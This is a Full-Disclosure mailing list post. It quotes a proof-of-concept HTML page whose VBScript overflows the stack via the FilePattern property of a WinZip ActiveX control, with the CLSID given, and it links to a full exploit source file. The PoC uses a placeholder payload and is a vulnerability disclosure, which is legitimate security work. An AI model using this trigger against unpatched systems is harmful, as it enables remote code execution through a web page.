here we go, enjoy! https://prdelka.blackart.org.uk/exploitz/prdelka-vs-MS-winzip.c
--- Micheal Turner <[EMAIL PROTECTED]> wrote: > 7245 correctly resolves this issue; standard stack > overflow in WZFILEVIEW.FilePattern snatching EIP; > PoC > below; > > <HTML> > <HEAD> > <TITLE></TITLE> > </HEAD> > <BODY> > <SCRIPT LANGUAGE="VBScript"> > <!-- > Sub WZFILEVIEW_OnAfterItemAdd(Item) > WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE" > end sub > --> > </SCRIPT> > <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200 > CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904"> > </OBJECT> > </BODY> > </HTML> > > > -- prdelka > > > > > > > ___________________________________________________________ > > All new Yahoo! Mail "The new Interface is stunning > in its simplicity and ease of use." - PC Magazine > http://uk.docs.yahoo.com/nowyoucan.html > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - > http://secunia.com/ > Send instant messages to your online friends http://uk.messenger.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
